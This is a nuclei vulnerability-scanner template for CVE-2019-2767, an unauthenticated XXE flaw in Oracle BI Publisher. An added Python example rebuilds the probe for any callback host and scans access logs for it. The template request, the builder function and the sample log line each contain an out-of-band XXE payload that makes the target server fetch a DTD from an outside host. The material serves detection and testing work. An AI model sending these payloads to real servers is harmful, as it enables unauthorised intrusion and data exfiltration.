nuclei-templates/cves/2019/CVE-2019-2767.yaml

id: CVE-2019-2767

info:
  name: Oracle Business Intelligence - Publisher XXE
  author: madrobot
  severity: high
  description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows an unauthenticated attacker with network access via HTTP to compromise BI Publisher.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2767
  tags: cve,cve2019,oracle,xxe,oast

requests:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP interaction: the server fetched the external DTD
        words:
          - "http"
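The template above sends a blind, out-of-band XXE probe: the `xml` parameter declares an external parameter entity whose SYSTEM URI points at the interactsh host, and the `interactsh_protocol` matcher fires when the BI Publisher parser fetches that DTD. The following Python is an added example, not part of nuclei-templates or of ProjectDiscovery's code. It rebuilds the same probe for an arbitrary callback host (the endpoint, parameter names and payload structure are taken from the template) and, for the defensive side, parses access-log request lines to the `/xmlpserver/convert` endpoint and extracts the host an attacker's DTD would make the server contact. The callback hosts `abc123.oast.example` and `oast.example` and the access-log lines are constructed for this example.

```python
"""Rebuild and recognise the out-of-band XXE probe from the CVE-2019-2767
nuclei template.  Added example: not part of nuclei-templates.

Endpoint, parameter names and payload structure come from the template;
the callback hosts and the access-log lines below are constructed."""
import re
from urllib.parse import parse_qs, quote, urlsplit

ENDPOINT = "/xmlpserver/convert"  # from the template


def build_probe_path(callback_host: str) -> str:
    """Return the request target the template sends, pointing the external
    parameter entity at callback_host.  The payload is fully percent-encoded
    here; the template leaves '<' and '"' raw and uses '+' for spaces, and
    the server decodes both forms to the same XML."""
    payload = (
        '<?xml version="1.0" ?>'
        "<!DOCTYPE r [<!ELEMENT r ANY >"
        f'<!ENTITY % sp SYSTEM "http://{callback_host}/xxe.xml">%sp;%param1;]>'
    )
    return f"{ENDPOINT}?xml={quote(payload, safe='')}&_xf=Excel&_xl=123&template=123"


# External entity declaration: <!ENTITY [%] name SYSTEM "uri"> or
# <!ENTITY [%] name PUBLIC "pubid" "uri">.  Covers parameter entities (as in
# the template) and general entities (the classic file:// XXE).
_EXTERNAL_ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s*)?[\w.-]+\s+
        (?:SYSTEM\s+|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+)
        (?:"([^"]*)"|'([^']*)')""",
    re.IGNORECASE | re.VERBOSE,
)
# <!DOCTYPE name SYSTEM "uri"> makes the parser fetch a remote external subset.
_EXTERNAL_DOCTYPE_RE = re.compile(
    r"""<!DOCTYPE\s+[\w.-]+\s+
        (?:SYSTEM\s+|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+)
        (?:"([^"]*)"|'([^']*)')""",
    re.IGNORECASE | re.VERBOSE,
)


def external_dtd_uris(xml_text: str) -> list[str]:
    """URIs the parser would fetch while processing the DTD of xml_text.
    An empty list means no external entity or external subset is declared."""
    uris = []
    for pattern in (_EXTERNAL_DOCTYPE_RE, _EXTERNAL_ENTITY_RE):
        for dq, sq in pattern.findall(xml_text):
            uris.append(dq or sq)
    return uris


_REQUEST_LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d')


def find_xxe_in_access_log(line: str) -> list[str]:
    """Given one access-log line, return the hosts an XXE payload sent to the
    convert endpoint would make the server contact ([] for benign lines)."""
    m = _REQUEST_LINE_RE.search(line)
    if not m:
        return []
    # Apache escapes '"' inside the logged request line as '\"'; undo that.
    target = m.group("target").replace('\\"', '"')
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    hosts = []
    # parse_qs undoes both '+' and percent-encoding, as the server would.
    for xml_text in parse_qs(parts.query).get("xml", []):
        for uri in external_dtd_uris(xml_text):
            host = urlsplit(uri).hostname
            if host:
                hosts.append(host)
    return hosts


# Constructed access-log lines (Apache combined format, '"' escaped as '\"').
# Line 0 is the template's request with {{interactsh-url}} replaced by an
# assumed callback host; lines 1 and 2 are benign.
SAMPLE_LOG = [
    r'203.0.113.7 - - [08/Jun/2021:16:29:59 +0000] "GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//abc123.oast.example/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    r'203.0.113.7 - - [08/Jun/2021:16:30:01 +0000] "GET /xmlpserver/login.jsp HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    r'203.0.113.7 - - [08/Jun/2021:16:30:05 +0000] "GET /xmlpserver/convert?xml=%3C%3Fxml+version%3D%221.0%22%3F%3E%3Cr%2F%3E&_xf=Excel HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    print(build_probe_path("oast.example"))
    for line in SAMPLE_LOG:
        print(find_xxe_in_access_log(line) or "benign", "<-", line[:60])
```

The log check keys on the DTD fetch itself rather than on an interactsh domain, so it also flags variants that use a different callback host, a `file://` general entity, or an external `<!DOCTYPE ... SYSTEM>` subset. Note what the template's matcher proves: an `http` interaction means the parser resolved the external entity and contacted the callback host, which confirms the XXE, but on its own says nothing about what data the `xxe.xml` DTD hosted there would go on to exfiltrate.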